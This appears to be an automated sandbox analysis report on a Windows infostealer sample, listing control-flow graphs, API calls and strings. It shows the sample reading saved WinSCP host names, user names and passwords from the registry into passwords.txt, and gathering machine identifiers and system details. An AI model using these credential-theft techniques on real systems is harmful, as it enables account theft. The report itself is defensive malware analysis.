                                                                                                                                                                                                                                                                                      control_flow_graph 2447 40d9c0-40da5d memset * 4 RegOpenKeyExA 2448 40daa2-40dac8 call 410230 * 4 2447->2448 2449 40da5f-40da87 RegGetValueA 2447->2449 2451 40da89-40da8c 2449->2451 2452 40da8e-40da95 2449->2452 2454 40da97-40da99 2451->2454 2452->2454 2455 40dacb-40dacd 2452->2455 2454->2448 2459 40da9b-40da9c RegCloseKey 2454->2459 2457 40dadd-40daf4 RegOpenKeyExA 2455->2457 2458 40dacf-40dad6 RegCloseKey 2455->2458 2457->2448 2461 40daf6-40db22 RegEnumKeyExA 2457->2461 2458->2457 2459->2448 2461->2451 2463 40db28-40db3e call 4101c0 2461->2463 2469 40dbb2-40dc51 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA 2463->2469 2489 40dc53-40dc6a call 410340 call 410290 2469->2489 2490 40dc6c-40dc90 call 411ea0 call 4102e0 call 410290 call 410230 2469->2490 2499 40dc92-40dd5c call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA call 410340 call 410290 call 410230 StrCmpCA 2489->2499 2490->2499 2531 40dd62-40dd80 call 40d250 2499->2531 2532 40db4b-40dbac call 410340 call 410290 call 410230 RegEnumKeyExA 2499->2532 2538 40dd82 2531->2538 2539 40dd85-40dda9 call 410340 call 410290 call 410230 2531->2539 2532->2469 2546 40dde4-40de5c call 410530 lstrlenA call 410530 call 4101c0 call 406f80 call 413e50 call 410230 2532->2546 2538->2539 2539->2532 2552 40ddaf-40ddbe 2539->2552 2570 40de6c-40de77 call 410230 2546->2570 2571 40de5e-40de65 RegCloseKey 2546->2571 2554 40db42-40db48 ??3@YAXPAX@Z 2552->2554 2555 40ddc4-40ddc6 2552->2555 2554->2532 2557 40ddc8-40ddcd 2555->2557 2558 40dddf _invalid_parameter_noinfo_noreturn 2555->2558 2557->2558 2560 40ddcf-40ddd4 2557->2560 2558->2546 2560->2558 2562 40ddd6-40ddd9 2560->2562 2562->2558 2564 40db40 2562->2564 2564->2554 2570->2448 2571->2570
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040DAD0
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DAEC
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32 ref: 0040DB1A
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32 ref: 0040DB9D
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040DB43
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,00000004,?,?,?), ref: 0040DC49
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,00000400,?,?,00421509,?,?,?), ref: 0040DD2C
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0042150A,?,?,Password: ), ref: 0040DD54
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?), ref: 0040DDDF
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040DDFE
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,passwords.txt), ref: 0040DE5F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411EA0: wsprintfA.USER32 ref: 00411EB5
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memset$CloseValuelstrcpy$EnumOpenlstrcatlstrlen$??3@_invalid_parameter_noinfo_noreturnwsprintf
                                                                                                                                                                                                                                                                                      • String ID: Login: $:22$Host: $HostName$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$k@$passwords.txt$#
                                                                                                                                                                                                                                                                                      • API String ID: 3659326365-2564332296
                                                                                                                                                                                                                                                                                      • Opcode ID: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                      • Instruction ID: 9d2ed302519055baedf3f01fb35ec56aa45f2f10d73b1c3b99b849dfdee8a1d1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D19371B002186BDB14ABA1DC9ABFF77B9AF44704F10041EF506B7281DBBC5985CBA9
                                                                                                                                                                                                                                                                                      Function 00413510 Relevance: 49.8, APIs: 2, Strings: 26, Instructions: 776stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 2574 413510-413e47 call 4101c0 call 410340 call 410290 call 410230 call 401360 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411120 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410700 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410540 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 GetCurrentProcessId call 411cc0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4107c0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108e0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108b0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4110a0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4109f0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410990 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410b30 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410be0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410ba0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410cb0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d30 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410fe0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 call 4101c0 call 410200 * 4 call 413e50 call 410230 * 6
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410920: wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411120: CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410700: lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,Path: ,?,?,00421508,?,?,?,?,?,?,HWID: ,?,?,00421509), ref: 0041371F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411CC0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411CC0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411CC0: CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004110A0: wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004109F0: LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410990: wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410B30: RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BE0: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,?), ref: 00410C19
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BE0: GetLastError.KERNEL32 ref: 00410C1F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BE0: wsprintfA.USER32 ref: 00410C7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BA0: GetSystemInfo.KERNEL32(?), ref: 00410BAA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410BA0: wsprintfA.USER32 ref: 00410BBE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410CB0: wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410FE0: CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410D80: lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00421509,?,?,?,?,?,?,Install Date: ,?,?,00421509,?,?,00000000), ref: 00413D8B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
